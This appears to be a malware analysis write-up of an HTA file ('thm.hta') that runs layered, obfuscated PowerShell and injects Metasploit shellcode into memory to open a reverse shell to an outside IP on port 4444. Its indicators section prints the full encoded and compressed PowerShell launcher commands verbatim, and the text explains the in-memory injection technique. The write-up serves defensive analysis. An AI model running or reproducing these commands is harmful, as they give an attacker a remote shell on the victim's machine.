thm.hta – MetaSploit Shellcode Payload

December 28, 2023

SHA256: f94702fecc39579eab7f51a1519495c78d2413daa652a9e989414af2528926e6

Summary

thm.hta is an HTA file that contains VBScript code that will create a Wscript.Shell and use it to run a Base64 encoded PowerShell script. The PowerShell script contains another PowerShell script that utilizes the System.Diagnostics Object to set up a process with ProcessStartInfo setting the arguments to an additional Base64 encoded and compressed PowerShell script and starting the process. The last decoded and decompressed script contains a final Base64 encoded payload that is decoded and converted into a byte array which in turn is wrote into memory of the running process and executed. The executed shellcode will attempt to establish a reverse shell with the IP 46.101.103.9 on port 4444.

Analysis

The initial HTA file contains VBSscript code. This script creates a Wscript.Shell object setting it to the variable eDp, and setting a Scripting.FileSystemObject to the variable kxP1eY. The variable kxP1ey is used to get the filepath of powershell.exe and eDp is used to run PowerShell with the base64 encoded script. the “-nop” parameter ensures no powershell profile is loaded, ‘-w hidden’ sets the window style to hidden in order to quietly execute in the background, and the ‘-e’ tells PowerShell to execute the encoded command.

Converting the string from Base64 shows additional PowerShell code.

This script creates a System.Diagonstics.ProcessStartInfo object setting it to $s. the objects filename is set to powershell.exe and the objects arguments are set to execute a scriptblock with the ‘-nop -w hidden -c’ arguments. The scriptblock creates an object that converts and decompresses the Base64 encoded and Gzip compressed string. Additionally, the -f is used to format the string replacing {0} with ‘=’ and {1} with ‘m’. This is used to further obfuscate the code.

Decoding and decompressing the string results in yet more PowerShell code.

The first two functions moE and zcG set up the functionality for PowerShell to be able to call Win32 API functions. moE is used is used to find and locate the functions, and zcG supplies the parameters and understand function return values. The variable $f7 is a Base64 encoded payload that is decoded and converted into a byte array containing the shellcode that is ultimately wrote into memory and executed. The script utilizes the VirtualAlloc API call to allocate memory space in the running process. The values 0x3000 indicate reserve and commit this memory, while the value 0x40 indicates the memory should have RWX privileges. The Copy function call is used to fill the memory space with the shellcode, and is executed with the CreateThread API call. Finally a call to the WaitForSingleObject API call is used to block the execution and wait for the shellcode to finish executing, which is set to 0xffffffff which indicates it will wait forever.

We can utilize CyberChef to decode the shellocde bytes and export to a file.

Running scdbg against the file does not provide any low hanging fruit and needs to be further analyzed.

The shellcode that is executed results in PowerShell attempting to reach out to the IP 46.101.103.9 on port 4444.

If we change the host IP to the C2 address and open up a Netcat listener on port 4444 we can see that it will establish a remote shell with full command execution capabilities.

IOCs

SHA256 File Hash:

f94702fecc39579eab7f51a1519495c78d2413daa652a9e989414af2528926e6

File Name:

thm.hta

Network:

46.101.103.9

Port 4444

Commands:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAmACgAWwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQA6ADoAYwByAGUAYQB0AGUAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoACgAJwAnAEgANABzAEkAQQBMAFQAeQBoADIAVQBDAEEANwBWAFcAYgBXAC8AaQBPAEIARAArAHYAdABMACsAaAAyAGkARgBSAE4AQgBSAFgAdgBxAHkAJwAnACsAJwAnADcAJwAnACsAJwAnAFYAYQBxAGQARQA1AEkAUwBsAGgAbwBTAFEATwBoAGgAVQBXAHIAawBKAGoARQByAFIATgBEADQAaABUAG8AMwB2ADcAMwBHAHkAZQBrAHQARgBwADYAMQB6AHQAcABMAFMARgBpAGUAMgBZADgAZgB1AGEAWgBHAGMALwBUACcAJwArACcAJwB5AE8AVwBFAFIAVgBMAEkATgBPAG4ASAB4AHcALwBTAGQAJwAnACsAJwAnAHYAUwBkADIAQQBrAGwAdQBjAFIAdgBlADIAZgBkAHEAbABTAGkAYQBuAHYANQBVAE4AbgB0AGwANQA0AHUAdABlAC8AUwBoAFMAUgBQADAARwBMAFIAWQBxAEYARABvAHUAbgA1AHUAWgByAEcATQBZADUANABQAHEAOQBkAFkAbwA2AFMAQgBJAGMAegBTAG4AQQBpAFYANgBTAC8AcABGAEcAQQBZADMAeAB3AFAAYgB2AEgATABwAGQAKwBTAEsAWAB2AHQAVQB2AEsAWgBnADcAZABpAHsAMQB9ADEAVQB4AHcAMgB3AGQASQBBAGkAVAArAHgAMQB7ADEAfQBlAHMASQAzADIAcgBXAGcAaABJAHUAbAA3ADkAOQBLADEAYwB7ADEAfQBCADgAMQBwAFQAVgB1AHsAMQB9AEQAawAzAGsAcwByAFYASgBPAEEANQByAEgAcQBYAGwAaQB2AFMAegBJAGcANABjAGIAQgBaAFkATAB2AGUASQBHACcAJwArACcAJwA3AE8ARQB6AFgAbAB0AFIASwBLAGoAdwA5AG8AdwBTAHAAdwA1AHYAZwBKAHIAagA3AGkASABlAGMAQwA4AHAAQQB5AFgAMgBWADAAbgB4AGoAeQBOAG8ALwB4AFcAdwBrAHcAdQBKAEoAZgBoAHMAeAA4AHoARgAzAGwAZQBqAEoATwBrAFgASgBVAHsAMQB9ADQAbwBEAEoAZABQAHEAbgBQAE4AewAxAH0AZQBmAHAATgAnACcAKwAnACcARwBuAEkAUwA0AFoAawBRAGMAeAAyAHgAaAA0AGYAaQBSAHUARABpAHAAdABaADMASQBvAC8AZwBHAHoANgBlAGcAWgBmAEcAWQBSAFAANgAwAFUAZwBHAHgAUgAvAGEAQQA1AFYASwBVAFUAbABxAFYALwBvAHMAWgArAFEAcQB2AEMAdQB6AGUAcQB5AFMALwBWAEEASwBwAFAAbwA4AHIAVgBRAGoAcgBuAG4AdgAyAHsAMQB9AEoAZABTAG4ARwB1AFcAOQB6AGkAYQBVADYARQBDADQANQBrAE8AQQBPAEYAUABnAGUASwA4AEkATgBHAFQAZQA3AHsAMQB9AEgAUgBMAHUARgBZAGsAeQB5AEgAUQB4AE8AeQAzADIAVwBrAEUAegAzAFEAewAxAH0AcABVAHAAUgA0AGMANwAzAEEAVwBiADIAQgBhAEcAcwBRAHAAcgAnACcAKwAnACcAawB5AGYASQBaAGQASwA5ADkAZgBYADEAZgBjAGEAYQB4AGEAYQBRAG8AKwBoAE4AaQB4AE4AYgBFAGEAOAA2AGMANwBBAEsAdwBhAFUAMwBMADQAUQBlAFoAdgBOAEwAVAB3AG4ARQBXADUAdABJAGkAYwBrAGIAawBGAFkAZQBWADkAUQA4AEoAegBpAEQASQA5AGEASQBYAFkARgAvAHMAbgBsADcAUQBiADIAVwBwAGgAaQAzACsARQBDAFoAcwBHAE4AWAA5AFMAMABrAFAAQgBuAFgAUwBVAGwAMQBNAE0AeABjAGkARwB3AEMAWABnAEYATQBhACsAOABkAGkAYQBQAG4ARgB3ADIAbwBoADQATwBBAGIAdAA4AEQAewAxAH0AUQB0AHoAUwBGAE4AYwBDAEcAOQBUAFkAMQBOAGMAYgBxAFkAZwAxAEIAWgBwAFUANgBTAFYASwBWACsAQwBuAG4AcQBWAGkAVQBMAE8AeABSADcAVgBRAGwARgBDAGQAbAB1AG8AWgBTAHoANwBMAE8AOABjADcAJwAnACsAJwAnAGUAWABVAGsANQBjAEoAKwBHAEYAdQBXAG4AbABGAFoAagBiAFEAMQBVAFcASgBUAHgATwBYAFkAZwBwAEEARABDAHcARgB0AGcAbABEAGgAVgA0AFYASwBVADIAOABiAEMAeQBzAFkAaABmAEgARgA3AGUAaQA0AGIAcQBVAEEAcgBKAEEANQBZAGUASQBSAHEAdwBJAGwAQwB3AHUARwBCAEsARABIADQASwBWAGwAUgBxAEYAdQBaAEcAdQBLAEEANABCAEoARwBzAGEATwBqAFUAOABhAEYARQBiAEQATQBrAFkANQBiAGoAWQA2ACsAOAAxADgAcwBpAEQAWABMAE8AQwAxAEEASwBOAEYANwA0AEMASgBHADIASwBPAE4AVgB5AFMAWQB4AGgAdwBJAGsAQQBCAGIATQArAGoAOAB1AC8ARgBwADUAdwAnACcAKwAnACcAQgBjADEAeAB0AHUAdwB5AEUAVgB7ADEAfQBUAFoAUQBOAEYAOQB3AHYAegBVADgARgBPADcAZgBnAFoARgBEAEUASABHAEQAUQBZAHgAWQBxAFQAbwBJAC8ASAArAGMAVgBSAHYANQBVADEAMABqAHIAcABOADkAaQBLAHcAUgBEADAAMgA5AE0AVwA3AEcARwA5AHQAagBvACcAJwArACcAJwBlAFIAMQBxAEcAZAB5ADYAMAAwAGgAMwBHAEEAUQBHAGEAUgBvACsAegBEAGQARAB6AGUALwB6AHgAdQBMAHIAWQBOAEQAdQBXAEsAMAAyAGkAbAB2AHIAWQBJADYATQB4AE4ARABhAHkAcwBaACcAJwArACcAJwBzAEsAcwBoAHQAawAxAE8ANwBvAHcAeQBIAG8ARQBmAFUAcgBuAHsAMQB9AC8ATgBwAEMAbgBkAG4AMwBEAGgAdwBNAFUASQAzAEMAVgB4AHIAagBoAEsAdwAxAGQANwBWAHAASwBvAEoARQBHADgAaQAyAHoAYgAnACcAKwAnACcAUgA0ADMAeAAwAGIAOQBqAEMAcgBrAHkAVABJAHMAMQBCADQAOQAyADMAKwAyAHEAeAAwAGYAdAAyAC8AWABBADMAVABWADYANgBCAEEAdgAvAGIAMAA1ACcAJwArACcAJwBxAEcAZQA2AFQAOABJAC8AZgBIAEQAWgBiAGUAbABaAFgATgBYAHoATQAyADcAUgBDAE0AYQBuAEsAUABwAGQANgBZAGQANABKAEcAOQBVAEUAYQBhAFAAagBiAHQAaABlAEgALwBzAGYASgBOAHUAMQBzAC8AMQBnAE0ARgAxAGcAMgB5ADcAaQA3AHMATwBvAHgAewAxAH0AcwAvAE0AWQBlAFUAOAA5AGUAdgBiAFUAQQAzAGQATgBlADkAdwBoAGUARwB6ADQAZQBPAE0AagBFAHkASAByAEwAcQBMAFcAYgBLAFUAaQBSAFgAZQA3AG8AUgAyAHAAUQAzADAASQBhAHcAOABEAEkAMQBxAGIAcwAwAFgAUAAyADkAeQAxADYAMQAvAHMASABzAEUATABoAGsAdwBOAEkAWgAxAEMATgBvAGIASQBXAGIAWABxAFQAVgBzAHgAeABaADMAZwBoADYAeAArAEgAVgBsAEcAcABHADcALwBGAFgATQBXAEwAMQB0AGYANgBqADcAbwBHAHMAVAAxAGwAaAByADQARABEAFkASgA3AEoAMgBZAHMAKwBWADQAYwAnACcAKwAnACcAWABzAFQAaQBEADMAZgB2AFUARQBJAC8ATABKAHsAMQB9AHcAZgAxAHMAWgBDAEsAVQB4ADgAeQBFAHsAJwAnACsAJwAnADEAfQBCAGsARQBkADIANwB0AHAAbgBmAFYAYwA1AFYAbAB5ADYAYgBLADgATABwADcATgBrADQAOAByAGEATwBiAEMAaABxAFMAcQB4AHYAVgB2AEYAdgA3AEMAZwBPAGIASQBXAHcAcgB3ADEAeQB2AFUAegA4AFQAMwAxAEYAOQBvAHgAMQAyAFYAcwBNAE4ALwBDADQALwBZADMAZABWAEQAeAA3AHIATgB1AEIAdgBnAFkAOQBmAHkAZQBwAEUAUwBYADMAUwBiAG8ALwBnAEgAcgBQAEgARgBYAGMANgBJAC8AQQByAHAATABOAEQATAAvAFAAcgB6AEcAUgA5AE4ARAA1AFQAVwBlAHYAMAB1AEQAMwBVADAANABZADcAYwBNAE0AdgBTADMARgAvADQAcwBYADEAcABuAGwAeAA4AFEAJwAnACsAJwAnAGsAbwBPAGgAewAxAH0AUwBpAEIAOABkAFQAawB2AEwAYQAxAEcAKwBQADMANABvAGUAZgByAGcAQgBVAC8AZgBhAGsAOAA5AEoAMAA0AEMAaAB3AEoALwBvAGUAOABVADkAVQBOAG4AcwBiADcAdABJADMAMQBHAGgASQBZAHMAaQAwAGYASgBBADQANABqAFQASwBHAEoAUQA1AHMAdgBVAGcAOQBSAHkAbAB6AFIAeQBFAFQARABnAFIANgBhAGQAegBiAFIAYQBJAGQARwA1AHQARwArAHIAJwAnACsAJwAnADQAcgAwAEwARgBqAFoAOQBiAGQAaQA2AGYAeAA4AEQARAAnACcAKwAnACcANgBLAHsAMQB9AG4AbABhADYAKwBMAEkANQAnACcAKwAnACcAMABHADEAcwBUADUAcQBOAEsAQQBwAE4AZABhAE4ANAB5AHgAbgAzADMAOAB2AGwAUwAwADIATQBwAGkAcQBpAHEAWQB7ADEAfQBVAE0AawBOADAAOAB3AHcAMgBDAEoAegBTAFoAWgAvAE8AMAB6AHcAZABPAEYAUQBSAE4AOABFADYAaQAzAE0ANABPAFEASABxAEgAcABRAGcALwBOAGkASgBKAEIAVABHAEsATQB2AGMAYwBzAHYAOQBjAHkAQQBIAFcAbwBBAFYAeABNAHUAUABSAEYAUABGAGkAQQBHAEsAQgAvAGcAcABWAFQAaQBvAHAAewAxAH0ALwBmAEIAeQBVAGsAdgA1AHAALwArAFMAMwBzAHsAMQB9AFYAYgBVAEEAUAA0ADgALwA2AEYATABiAHUAMQBmADkAaAA5AEYANABNAGEAMQBRAHkAYQBYADEAWgBmAEwANwB4AG8AUQA3AC8AdgAvAGkATwBIAGMAQgBDADAAbwBEAEYAUQBuAEQAOQBTADkAcwBLAHcAegBZADgAWAB3AGMAMQBpAEEAdwBrAHcAMwB3ADcAeABlAEwAOQBPACsAYwBFACcAJwArACcAJwBWAFAAQQBhAHoAMQB2AFEAMwBBADMARQA4AEgAagBnAE0AQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBtACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

"C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIALTyh2UCA7VWbW/iOBD+vtL+h2iFRNBRXvqy'+'7'+'VaqdE5ISlhoSQOhhUWrkJjErRND4hTo3v73GyektFp61ztpLSFie2Y8fuaZGc/T'+'yOWERVLINOnHxw/Sd'+'vSd2AklucRve2fdqlSianv5UNntl54ute/ShSRP0GLRYqFDoun5uZrGMY54Pq9dYo6SBIczSnAiV6S/pFGAY3xwPbvHLpd+SKXvtUvKZg7di{1}1Uxw2wdIAiT+x1{1}esI32rWghIul799K1c{1}B81pTVu{1}Dk3ksrVJOA5rHqXlivSzIg4cbBZYLveIG'+'7OEzXltRKKjw9owSpw5vgJrj7iHecC8pAyX2V0nxjyNo/xWwkwuJJfhsx8zF3lejJOkXJU{1}4oDJdPqnPN{1}efpN'+'GnIS4ZkQcx2xh4fiRuDiptZ3Io/gGz6egZfGYRP60UgGxR/aA5VKUUlqV/osZ+QqvCuzeqyS/VAKpPo8rVQjrnnv2{1}JdSnGuW9ziaU6EC45kOAOFPgeK8INGTe7{1}HRLuFYkyyHQxOy32WkEz3Q{1}pUpR4c73AWb2BaGsQpr'+'kyfIZdK99fX1fcaaxaaQo+hNixNbEa86c7AKwaU3L4QeZvNLTwnEW5tIickbkFYeV9Q8JziDI9aIXYF/snl7Qb2Wphi3+ECZsGNX9S0kPBnXSUl1MMxciGwCXgFMa+8diaPnFw2oh4OAbt8D{1}QtzSFNcCG9TY1NcbqYg1BZpU6SVKV+CnnqViULOxR7VQlFCdluoZSz7LO8c7'+'eXUk5cJ+GFuWnlFZjbQ1UWJTxOXYgpADCwFtglDhV4VKU28bCysYhfHF7ei4bqUArJA5YeIRqwIlCwuGBKDH4KVlRqFuZGuKA4BJGsaOjU8aFEbDMkY5bjY6+818siDXLOC1AKNF74CJG2KONVySYxhwIkABbM+j8u/Fp5w'+'Bc1xtuwyEV{1}TZQNF9wvzU8FO7fgZFDEHGDQYxYqToI/H+cVRv5U10jrpN9iKwRD029MW7GG9tjo'+'eR1qGdy600h3GAQGaRo+zDdDze/zxuLrYNDuWK02ilvrYI6MxNDaysZ'+'sKshtk1O7owyHoEfUrn{1}/NpCndn3DhwMUI3CVxrjhKw1d7VpKoJEG8i2zb'+'R43x0b9jCrkyTIs1B4923+2qx0ft2/XA3TV66BAv/b05'+'qGe6T8I/fHDZbelZXNXzM27RCManKPpd6Yd4JG9UEaaPjbtheH/sfJNu1s/1gMF1g2y7i7sOox{1}s/MYeU89evbUA3dNe9wheGz4eOMjEyHrLqLWbKUiRXe7oR2pQ30Iaw8DI1qbs0XP29y161/sHsELhkwNIZ1CNobIWbXqTVsxxZ3gh6x+HVlGpG7/FXMWL1tf6j7oGsT1lhr4DDYJ7J2Ys+V4c'+'XsTiD3fvUEI/LJ{1}wf1sZCKUx8yE{'+'1}BkEd27tpnfVc5Vly6bK8Lp7Nk48raObChqSqxvVvFv7CgObIWwrw1yvUz8T31F9ox12VsMN/C4/Y3dVDx7rNuBvgY9fyepESX3Sbo/gHrPHFXc6I/ArpLNDL/PrzGR9ND5TWev0uD3U04Y7cMMvS3F/4sX1pnlx8Q'+'koOh{1}SiB8dTkvLa1G+P34oefrgBU/fak89J04ChwJ/oe8U9UNnsb7tI31GhIYsi0fJA44jTKGJQ5svUg9RylzRyETDgR6adzbRaIdG5tG+r'+'4r0LFjZ9bdi6fx8DD'+'6K{1}nla6+LI5'+'0G1sT5qNKApNdaN4yxn338vlS02MpiqiqY{1}UMkN08ww2CJzSZZ/O0zwdOFQRN8E6i3M4OQHqHpQg/NiJJBTGKMvccsv9cyAHWoAVxMuPRFPFiAGKB/gpVTiop{1}/fByUkv5p/+S3s{1}VbUAP48/6FLbu1f9h9F4Ma1QyaX1ZfL7xoQ7/v/iOHcBC0oDFQnD9S9sKwzY8Xwc1iAwkw3w7xeL9O+cE'+'VPAaz1vQ3A3E8HjgMAAA{0}')-f'=','m')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

Strings

CreateObject(“Wscript.Shell”)
CreateObject(“Scripting.FileSystemObject”)
powershell.exe -nop -w hidden -e
-nop -w hidden -c
System.Diagnostics.ProcessStartInfo
System.Diagnostics.Process
System.dll
Microsoft.Win32.UnsafeNativeMethods
GetProcAddress
GetModuleHandle
ReflectedDelegate
InMemoryModule
Invoke
FromBase64String
VirtualAlloc
VirtualProtect
CreateThread
WaitForSingleObject